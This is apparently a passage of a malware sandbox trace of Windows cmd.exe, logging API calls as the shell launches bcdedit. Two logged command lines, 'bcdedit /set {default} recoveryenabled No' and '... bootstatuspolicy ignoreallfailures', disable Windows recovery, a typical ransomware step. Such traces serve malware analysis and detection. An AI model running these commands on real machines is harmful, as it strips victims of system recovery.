_String2="COLOR") returned -1 [0203.004] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0203.005] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0203.005] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0203.005] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0203.005] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0203.005] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0203.005] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0203.005] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0203.005] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0203.005] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0203.005] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0203.005] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0203.005] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0203.005] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0203.005] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0203.005] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0203.005] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0203.005] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0203.005] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0203.005] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0203.005] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0203.005] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0203.005] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0203.005] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0203.005] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0203.005] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0203.005] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0203.005] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0203.006] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0203.006] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0203.006] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0203.006] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0203.006] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0203.006] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0203.006] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0203.006] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0203.006] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0203.006] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0203.006] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0203.006] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0203.006] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0203.006] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0203.006] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0203.006] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0203.006] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0203.006] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0203.007] GetProcessHeap () returned 0x280000 [0203.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4010) returned 0x2a3bf0 [0203.007] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0203.007] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0203.007] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0203.007] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0203.007] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0203.007] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0203.007] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0203.007] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0203.007] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0203.007] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0203.007] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0203.007] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0203.007] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0203.007] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0203.008] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0203.008] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0203.008] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0203.008] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0203.008] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0203.008] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0203.008] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0203.008] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0203.008] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0203.008] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0203.008] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0203.008] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0203.008] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0203.008] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0203.008] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0203.008] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0203.008] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0203.008] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0203.008] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0203.008] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0203.008] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0203.008] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0203.008] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0203.008] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0203.008] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0203.008] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0203.008] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0203.008] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0203.009] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0203.009] GetProcessHeap () returned 0x280000 [0203.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x2a09e0 [0203.009] SetErrorMode (uMode=0x0) returned 0x1 [0203.009] SetErrorMode (uMode=0x1) returned 0x0 [0203.009] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2a09f0, lpFilePart=0x20f770 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f770*="system32") returned 0x13 [0203.009] SetErrorMode (uMode=0x1) returned 0x1 [0203.009] GetProcessHeap () returned 0x280000 [0203.009] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2a09e0, Size=0x48) returned 0x2a09e0 [0203.009] GetProcessHeap () returned 0x280000 [0203.009] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2a09e0) returned 0x48 [0203.009] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.009] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.010] GetProcessHeap () returned 0x280000 [0203.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x104) returned 0x295c50 [0203.010] GetProcessHeap () returned 0x280000 [0203.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1f8) returned 0x2a0a40 [0203.013] GetProcessHeap () returned 0x280000 [0203.013] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2a0a40, Size=0x106) returned 0x2a0a40 [0203.013] GetProcessHeap () returned 0x280000 [0203.013] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2a0a40) returned 0x106 [0203.013] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.013] GetProcessHeap () returned 0x280000 [0203.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x2a0b60 [0203.013] GetProcessHeap () returned 0x280000 [0203.013] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2a0b60, Size=0x7e) returned 0x2a0b60 [0203.013] GetProcessHeap () returned 0x280000 [0203.013] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2a0b60) returned 0x7e [0203.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.013] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x20f4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f4e0) returned 0x295d60 [0203.014] GetProcessHeap () returned 0x280000 [0203.014] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x294730, Size=0x8) returned 0x2989e0 [0203.014] FindClose (in: hFindFile=0x295d60 | out: hFindFile=0x295d60) returned 1 [0203.014] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x20f4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f4e0) returned 0xffffffffffffffff [0203.014] GetLastError () returned 0x2 [0203.014] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x20f4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f4e0) returned 0x295d60 [0203.014] FindClose (in: hFindFile=0x295d60 | out: hFindFile=0x295d60) returned 1 [0203.015] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.015] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0203.015] GetProcessHeap () returned 0x280000 [0203.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x28) returned 0x294730 [0203.015] GetProcessHeap () returned 0x280000 [0203.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x2a0bf0 [0203.015] GetProcessHeap () returned 0x280000 [0203.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x66) returned 0x299fe0 [0203.015] GetProcessHeap () returned 0x280000 [0203.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x298b40 [0203.015] SetErrorMode (uMode=0x0) returned 0x1 [0203.015] SetErrorMode (uMode=0x1) returned 0x0 [0203.015] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x298b50, lpFilePart=0x20f500 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f500*="system32") returned 0x13 [0203.015] SetErrorMode (uMode=0x1) returned 0x1 [0203.015] GetProcessHeap () returned 0x280000 [0203.015] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x298b40, Size=0x48) returned 0x298b40 [0203.015] GetProcessHeap () returned 0x280000 [0203.015] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x298b40) returned 0x48 [0203.015] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.015] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.016] GetProcessHeap () returned 0x280000 [0203.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x104) returned 0x2a0e10 [0203.016] GetProcessHeap () returned 0x280000 [0203.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1f8) returned 0x2a0f20 [0203.016] GetProcessHeap () returned 0x280000 [0203.016] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2a0f20, Size=0x106) returned 0x2a0f20 [0203.016] GetProcessHeap () returned 0x280000 [0203.016] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2a0f20) returned 0x106 [0203.016] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.016] GetProcessHeap () returned 0x280000 [0203.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x298ba0 [0203.016] GetProcessHeap () returned 0x280000 [0203.016] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x298ba0, Size=0x7e) returned 0x298ba0 [0203.016] GetProcessHeap () returned 0x280000 [0203.016] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x298ba0) returned 0x7e [0203.016] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.016] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x20f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f270) returned 0x295d60 [0203.016] FindClose (in: hFindFile=0x295d60 | out: hFindFile=0x295d60) returned 1 [0203.017] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x20f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f270) returned 0xffffffffffffffff [0203.017] GetLastError () returned 0x2 [0203.017] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x20f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f270) returned 0x295d60 [0203.017] FindClose (in: hFindFile=0x295d60 | out: hFindFile=0x295d60) returned 1 [0203.017] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.017] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0203.017] GetConsoleTitleW (in: lpConsoleTitle=0x20f7c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.017] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f578, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f538 | out: lpAttributeList=0x20f578, lpSize=0x20f538) returned 1 [0203.017] UpdateProcThreadAttribute (in: lpAttributeList=0x20f578, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f528, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f578, lpPreviousValue=0x0) returned 1 [0203.018] GetStartupInfoW (in: lpStartupInfo=0x20f690 | out: lpStartupInfo=0x20f690*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0203.018] GetProcessHeap () returned 0x280000 [0203.018] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x29fe80 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.018] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0203.019] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0203.019] GetProcessHeap () returned 0x280000 [0203.019] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29fe80 | out: hHeap=0x280000) returned 1 [0203.019] GetProcessHeap () returned 0x280000 [0203.019] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x12) returned 0x295d60 [0203.019] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.019] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x20f5b0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="bcdedit /set {default} recoveryenabled No", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f560 | out: lpCommandLine="bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x20f560*(hProcess=0x58, hThread=0x54, dwProcessId=0x630, dwThreadId=0x7ac)) returned 1 [0203.467] CloseHandle (hObject=0x54) returned 1 [0203.467] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.467] GetProcessHeap () returned 0x280000 [0203.467] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2a3120 | out: hHeap=0x280000) returned 1 [0203.467] GetEnvironmentStringsW () returned 0x2a3120* [0203.467] GetProcessHeap () returned 0x280000 [0203.467] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xac4) returned 0x2a9c10 [0203.467] FreeEnvironmentStringsW (penv=0x2a3120) returned 1 [0203.467] GetProcessHeap () returned 0x280000 [0203.467] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295d60 | out: hHeap=0x280000) returned 1 [0203.467] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f578 | out: lpAttributeList=0x20f578) [0203.467] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0203.467] _close (_FileHandle=4) returned 0 [0203.468] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0204.221] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x20fa98 | out: lpExitCode=0x20fa98*=0x0) returned 1 [0204.221] CloseHandle (hObject=0x60) returned 1 [0204.221] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0204.350] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x20fa98 | out: lpExitCode=0x20fa98*=0x0) returned 1 [0204.350] CloseHandle (hObject=0x58) returned 1 [0204.350] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.350] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.351] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.351] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 1 [0204.351] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.351] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0204.351] SetConsoleInputExeNameW () returned 0x1 [0204.351] GetConsoleOutputCP () returned 0x1b5 [0204.352] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0204.352] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0204.352] exit (_Code=0) Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x42193000" os_pid = "0x5cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6dc" cmd_line = "C:\\Windows\\system32\\cmd.exe /C title 2495304|bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 157 os_tid = 0x5d4 [0202.750] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa50 | out: lpSystemTimeAsFileTime=0x16fa50*(dwLowDateTime=0x1d52b380, dwHighDateTime=0x1d661be)) [0202.750] GetCurrentProcessId () returned 0x5cc [0202.750] GetCurrentThreadId () returned 0x5d4 [0202.750] GetTickCount () returned 0x113e61b [0202.750] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa58 | out: lpPerformanceCount=0x16fa58*=13324586147) returned 1 [0202.752] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab50000 [0202.752] __set_app_type (_Type=0x1) [0202.752] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab77810) returned 0x0 [0202.752] __getmainargs (in: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610, _DoWildCard=0, _StartInfo=0x4ab7e0f4 | out: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610) returned 0 [0202.752] GetCurrentThreadId () returned 0x5d4 [0202.752] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5d4) returned 0x3c [0202.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0202.753] GetProcAddress (hModule=0x76f60000, lpProcName="SetThreadUILanguage") returned 0x76f76d40 [0202.753] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0202.753] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.753] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f9e8 | out: phkResult=0x16f9e8*=0x0) returned 0x2 [0202.754] VirtualQuery (in: lpAddress=0x16f9d0, lpBuffer=0x16f950, dwLength=0x30 | out: lpBuffer=0x16f950*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.754] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f950, dwLength=0x30 | out: lpBuffer=0x16f950*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.754] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f950, dwLength=0x30 | out: lpBuffer=0x16f950*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.754] VirtualQuery (in: lpAddress=0x74000, lpBuffer=0x16f950, dwLength=0x30 | out: lpBuffer=0x16f950*(BaseAddress=0x74000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.754] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f950, dwLength=0x30 | out: lpBuffer=0x16f950*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1a000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.754] GetConsoleOutputCP () returned 0x1b5 [0202.754] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0202.754] SetConsoleCtrlHandler (HandlerRoutine=0x4ab73184, Add=1) returned 1 [0202.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.755] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 1 [0202.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.755] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.756] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.756] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: 